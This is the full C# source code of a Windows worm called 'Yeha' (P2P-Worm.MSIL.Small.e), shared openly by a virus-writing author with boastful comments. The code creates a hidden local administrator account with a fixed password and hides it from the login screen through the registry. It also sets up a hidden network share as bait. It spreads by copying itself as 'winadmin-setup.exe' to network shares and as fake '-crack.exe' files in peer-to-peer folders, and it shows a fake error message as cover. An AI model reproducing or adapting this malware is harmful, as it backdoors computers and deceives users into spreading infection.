P2P-Worm.MSIL.Small.e - Source Code

1.    /*************************************************************
2.     * C# - MSIL.Yeha
3.     * >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
4.     * by free0n
5.     * vx13d.net free0n@vx13d.net
6.     * ###########################################################
7.     *
8.     * Yeha works by first checking itself in the registry
9.     * if it hasn't ran yet it will attempt to create a
10.     * new hidden local admin user account named Yeha with the
11.     * password yehawashere. After the account is created
12.     * it creates a new network share in C:\Yeha and makes the
13.     * directory as hidden. This is so if someone is browsing
14.     * the network we might lure them in. Each time the exe
15.     * is run it will spread to any open network shares that
16.     * were found in the mru list in the registry. It copies
17.     * as winadmin-setup.exe.
18.     *
19.     * After the share spreading is completed it copies itself
20.     * to commonly shared p2p folders as cracks for programs
21.     * found in the program files directory. For example if
22.     * Trilian directory is found it creates a trillian-crack.exe
23.     * once the p2p is done it will display message if the day
24.     * is the 25th that Yeha has been here if it's not it
25.     * displays a common windows error message.
26.     *
27.     * Note: This uses the same trick as Snoopy did as
28.     * it looks like a console application but the output
29.     * type is windows application so we don't get a dorky
30.     * cmd window popping up when it's ran. Compiled with
31.     * MS Visual C# express
32.     *
33.     * thx RRLF!
34.     * keep vxing!
35.     * >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
36.     ************************************************************/
37.    /************************************************************
38.     * Start of Program.cs
39.     * >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
40.     ************************************************************/
41.  
42.    using System;
43.    using System.Collections.Generic;
44.    using System.Text;
45.    using System.Windows.Forms;
46.    using System.IO;
47.  
48.    namespace Yeha {
49.  
50.        class Program {
51.  
52.            static void Main(string[] args) {
53.  
54.                Yeha yeha = new Yeha();
55.                if (!yeha.chkIt()) {
56.                    yeha.YehaUser();
57.                    yeha.CreateShare(@"C:\Yeha", "Yeha");
58.                }
59.  
60.                yeha.Share();
61.                yeha.p2p();
62.  
63.                if (DateTime.Now.Day == 25) {
64.                    MessageBox.Show("Yeha was here!", "Yeha", MessageBoxButtons.OK, MessageBoxIcon.Information);
65.                } else {
66.                    MessageBox.Show("Not a valid win32 program", "Windows", MessageBoxButtons.OK, MessageBoxIcon.Error);
67.                }
68.            }
69.        }
70.    }
71.  
72.    /************************************************************
73.     * Start of Yeha.cs
74.     * >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
75.     ************************************************************/
76.  
77.    using System;
78.    using System.Text;
79.    using System.IO;
80.    using System.Diagnostics;
81.    using System.DirectoryServices;
82.    using Microsoft.Win32;
83.    using System.Collections;
84.    using System.Collections.Generic;
85.    using System.Management;
86.  
87.    namespace Yeha {
88.  
89.        class Yeha {
90.  
91.            private string me = Convert.ToString(Process.GetCurrentProcess().MainModule.FileName);
92.  
93.            public bool chkIt() {
94.                //checking the registry to see if we have already ran. If
95.                //we aren't found in the registry we add the value.
96.                //Hkey local machine is good real estate ;)
97.  
98.                string regstr = (string)Registry.GetValue(@"HKEY_LOCAL_MACHINE\SOFTWARE\Yeha", "Yeha", "Yeha");
99.                if (regstr == "Yeha") {
100.                    return true;
101.                } else {
102.                    RegistryKey key = Registry.LocalMachine.OpenSubKey("Software", true);
103.                    RegistryKey newkey = key.CreateSubKey("Yeha");
104.                    newkey.SetValue("Yeha", me);
105.                    return false;
106.                }
107.            }
108.  
109.            public void p2p() {
110.  
111.                //our p2p spreading is basically just a list of common folders
112.                //if the folder exists we drop a copies of ourselves as cracks
113.                //for programs we find the program files folder
114.  
115.                ArrayList arSharedFolders = new ArrayList();
116.                arSharedFolders.Add(Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments) + "\\Downloads");
117.                arSharedFolders.Add(Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments) + "\\My Shared Folder");
118.                arSharedFolders.Add(Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments) + "\\Shared");
119.                arSharedFolders.Add(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Ares\\My Shared Folder");
120.                arSharedFolders.Add(Environment.GetFolderPath(Environment.SpecialFolder.Desktop) + "\\Downloads");
121.                arSharedFolders.Add(Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles) + "\\Shareaza\\Downloads");
122.  
123.                IEnumerator folder = arSharedFolders.GetEnumerator();
124.                while (folder.MoveNext()) {
125.                    string tada = Convert.ToString(folder.Current);
126.                    if (Directory.Exists(tada)) {
127.                        string progDir = Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles);
128.                        foreach (string d in Directory.GetDirectories(progDir)) {
129.                            string app = tada + "\\" + d.Substring(d.LastIndexOf("\\")).Replace("\\", string.Empty) + "-crack.exe";
130.                            File.Copy(me, app, true);
131.                        }
132.                    }
133.                }
134.            }
135.  
136.            public void YehaUser() {
137.  
138.                try {
139.  
140.                    //create our new admin user account on the local machine we are running on.
141.                    DirectoryEntry ad = new DirectoryEntry("WinNT://" + Environment.MachineName + ",computer");
142.                    DirectoryEntry usr = ad.Children.Add("Yeha", "user");
143.                    usr.Invoke("SetPassword", new object[] { "yehawashere" });
144.                    usr.CommitChanges();
145.  
146.                    DirectoryEntry de;
147.                    de = ad.Children.Find("Administrators", "group");
148.                    if (de != null) {
149.                        de.Invoke("Add", new object[] { usr.Path.ToString() });
150.                    }
151.  
152.                    //now we need to make the user hidden from the login screen and the
153.                    //user accounts applet in the control panel to do this we
154.                    //use a reg hack.
155.  
156.                    try {
157.                        string rkey = @"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList";
158.                        Registry.SetValue(rkey, "Yeha", 0, RegistryValueKind.DWord);
159.                    } catch (Exception er) { }
160.  
161.                } catch (Exception ex) { }
162.            }
163.  
164.            public void Share() {
165.  
166.                //copy ourselves to all the local network shares on the computer
167.                //this could be good bait when someone connects and wonders what
168.                //winadmin-setup is.
169.  
170.                try {
171.                    ManagementObjectSearcher shares = new
172.                    ManagementObjectSearcher("select * from win32_share");
173.                    foreach (ManagementObject serv in shares.Get()) {
174.                        string shareName = Convert.ToString(serv["Name"]);
175.                        if (!shareName.Contains("$")) {
176.                            File.Copy(me, @"\\" + Environment.MachineName + @"\" + shareName + @"\winadmin-setup.exe", true);
177.                        }
178.                    }
179.                } catch (Exception ex) { }
180.  
181.                //now we need to copy ourselves to other shares
182.                //on the network to do this we check for network shares
183.                //in the MRU list, we may get lucky we may not
184.  
185.                try {
186.                    string key = @"Software\Microsoft\Windows\CurrentVersion\Explorer\Map Network Drive MRU\";
187.                    RegistryKey reg = Registry.CurrentUser.OpenSubKey(key); ;
188.                    foreach (string valuename in reg.GetValueNames()) {
189.                        string path = reg.GetValue(valuename).ToString();
190.                        if (valuename.ToLower() != "mrulist") {
191.                            try {
192.                                File.Copy(me, path + @"\\winadmin-setup.exe", true);
193.                            } catch (Exception er) {
194.                                continue;
195.                            }
196.                        }
197.                    }
198.                    reg.Close();
199.                } catch (Exception er) { }
200.            }
201.  
202.            public void CreateShare(string dir, string name) {
203.  
204.                //we create our own shared folder on the network called Yeha
205.                //this is so if we get a user browsing the network they might
206.                //open it up and double click winadmin-setup.exe. You know a user
207.                //might be more susceptible to pick it up if the folder was
208.                //named pr0n or porn hehehe.
209.  
210.                try {
211.                    Directory.CreateDirectory(dir);
212.                    ManagementClass managementClass = new ManagementClass("Win32_Share");
213.                    ManagementBaseObject inParams = managementClass.GetMethodParameters("Create");
214.                    ManagementBaseObject outParams;
215.                    inParams["Description"] = name;
216.                    inParams["Name"] = name;
217.                    inParams["Path"] = dir;
218.                    inParams["Type"] = 0x0;
219.                    outParams = managementClass.InvokeMethod("Create", inParams, null);
220.  
221.                    //if the return value was 0 then we know we got the folder created
222.                    //so we are going to make it hidden..
223.                    if ((uint)(outParams.Properties["ReturnValue"].Value) == 0) {
224.                //make the dir hidden
225.                        if (Directory.Exists(dir)) {
226.                            DirectoryInfo d = new DirectoryInfo(dir);
227.                            d.Attributes = FileAttributes.Hidden;
228.                        }
229.                    }
230.  
231.                } catch (Exception e) { }
232.            }
233.        }
234.    }
235.  
236.  
237.